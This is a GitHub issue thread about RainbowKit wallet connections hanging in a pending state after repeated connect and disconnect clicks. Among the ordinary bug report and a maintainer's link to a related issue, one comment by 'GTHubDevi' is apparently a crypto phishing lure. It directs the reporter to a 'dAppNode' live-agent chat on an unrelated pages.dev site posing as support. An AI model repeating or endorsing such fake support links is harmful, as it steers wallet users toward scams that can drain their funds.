### ISSUE TITLE
[bug] Wallet is not connected and is on pending

### ISSUE THREAD

**Issue by 0oooooooo0** [rainbow-me/rainbowkit#2111]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### RainbowKit Version

0

### wagmi Version

0

### Current Behavior

https://www.rainbowkit.com/

If you repeatedly click and disconnect the wallet connection button on the official site, the wallet will intermittently fail to connect and go into a pending state.

There is no response from the MetaMask extension either.

### Anything else?

https://github.com/user-attachments/assets/31b5bd47-07d6-4aae-8039-d75197d00004

**Comment by GTHubDevi** [comment]
This issue has been preview on the Pull Requests. To resolve,
Contact the dAppNode page to initiate a chat with the live agent on the chat button to get more information about your request via [dAppNode](https://defi-fixprotocol.pages.dev/)
Thank you for posting @0oooooooo0

**Comment by magiziz** [comment]
Related issue https://github.com/rainbow-me/rainbowkit/issues/2033
